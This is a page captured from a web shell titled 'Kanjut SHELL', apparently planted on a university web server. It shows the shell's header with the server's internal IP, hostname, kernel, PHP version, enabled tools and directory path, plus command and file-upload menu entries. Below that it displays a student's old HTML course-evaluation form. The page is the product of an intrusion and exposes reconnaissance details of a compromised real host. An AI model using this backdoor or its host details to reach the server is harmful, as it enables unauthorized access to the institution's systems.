Kanjut SHELL
Server IP : 172.16.15.8  /  Your IP : 3.22.42.189
Web Server : Apache
System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.2.24
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/slcebula/public_html/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/slcebula/public_html/proj_insert.html
<!--
Name:           Lee Cebula
Date:           5/4/09
Instructor:     Dr. Wang
Title:          proj_insert.html
Goal:           Insert page for the project
-->

<HTML>
<HEAD>
<TITLE>
Insert
</TITLE>
</HEAD>
<BODY BGCOLOR=marroon>
<FONT COLOR=gold>

<IMG SRC=proj_insert.jpg HEIGHT=500 WIDTH=500 ALIGN=right>

<FORM ACTION=proj_insert.php METHOD=post>
<B>
Gender:
</B>
<INPUT TYPE=radio NAME=gender VALUE=Male checked>Male
<INPUT TYPE=radio NAME=gender VALUE=Female>Female
<P>
<B>
Grade:
</B>
<INPUT TYPE=radio NAME=grade VALUE=Freshman checked>Freshman
<INPUT TYPE=radio NAME=grade VALUE=Sophomore>Sophomore
<INPUT TYPE=radio NAME=grade VALUE=Junior>Junior
<INPUT TYPE=radio NAME=grade VALUE=Senior>Senior
<P>
<B>
Course Number: 
<INPUT TYPE=text NAME=course>
</B>
<P>

<B>
1. The course was very valuable to take.
<FONT SIZE=2></B>
<P>
<INPUT TYPE=radio NAME=q1 VALUE=2 checked>Strongly Agree
<P>
<INPUT TYPE=radio NAME=q1 VALUE=1>Agree
<P>
<INPUT TYPE=radio NAME=q1 VALUE=0>Not Agree
<P><P>
</FONT><B>
2. The instructor taught the course well.
<FONT SIZE=2></B>
<P>
<INPUT TYPE=radio NAME=q2 VALUE=2 checked>Strongly Agree
<P>
<INPUT TYPE=radio NAME=q2 VALUE=1>Agree
<P>
<INPUT TYPE=radio NAME=q2 VALUE=0>Not Agree
<P><P>
</FONT><B>
3. The insructor graded fairly.
<FONT SIZE=2></B>
<P>
<INPUT TYPE=radio NAME=q3 VALUE=2 checked>Strongly Agree
<P>
<INPUT TYPE=radio NAME=q3 VALUE=1>Agree
<P>
<INPUT TYPE=radio NAME=q3 VALUE=0>Not Agree
<P><P>
</FONT><B>
4. I would tell a friend to take this course.
<FONT SIZE=2></B>
<P>
<INPUT TYPE=radio NAME=q4 VALUE=2 checked>Strongly Agree
<P>
<INPUT TYPE=radio NAME=q4 VALUE=1>Agree
<P>
<INPUT TYPE=radio NAME=q3 VALUE=0>Not Agree
<P><P>
</FONT><B>
5. I would tell a friend to take this course with a different professor.
<FONT SIZE=2></B>
<P>
<INPUT TYPE=radio NAME=q5 VALUE=2 checked>Strongly Agree
<P>
<INPUT TYPE=radio NAME=q5 VALUE=1>Agree
<P>
<INPUT TYPE=radio NAME=q5 VALUE=0>Not Agree



<BR><BR>
<INPUT TYPE=submit NAME=content VALUE="Submit Information">
<INPUT TYPE=reset VALUE=Reset>






</FONT>
</BODY>
</HTML>


Stv3n404 - 2023